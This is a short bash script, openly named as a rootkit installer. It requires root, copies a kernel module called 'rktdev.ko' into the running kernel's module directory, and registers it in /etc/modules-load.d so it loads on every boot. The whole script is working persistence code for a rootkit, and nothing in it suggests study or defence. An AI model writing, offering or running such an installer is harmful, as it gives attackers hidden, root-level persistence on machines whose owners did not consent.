#!/bin/bash

if [ "$(id -u)" -ne 0 ]; then
    echo "This script must be run as root."
    exit 1
fi

ROOTKIT_NAME="rktdev"

ROOTKIT_PATH="$(pwd)/$ROOTKIT_NAME.ko"

CONF_DIR="/etc/modules-load.d"

MODULE_DIR="/usr/lib/modules/$(uname -r)/kernel"


if [ ! -f "$ROOTKIT_PATH" ]; then
    echo "Error: '$ROOTKIT_PATH' was not found."
    exit 1
fi


echo "Copying $ROOTKIT_PATH to $MODULE_DIR/$ROOTKIT_NAME.ko"
mkdir -p "$MODULE_DIR"
cp "$ROOTKIT_PATH" "$MODULE_DIR/$ROOTKIT_NAME.ko"

# echo "Running depmod..."
# depmod

echo "Configuring the module to load on startup..."
echo "$ROOTKIT_NAME" > "$CONF_DIR/$ROOTKIT_NAME.conf"

echo "$ROOTKIT_NAME will be loaded automatically at startup."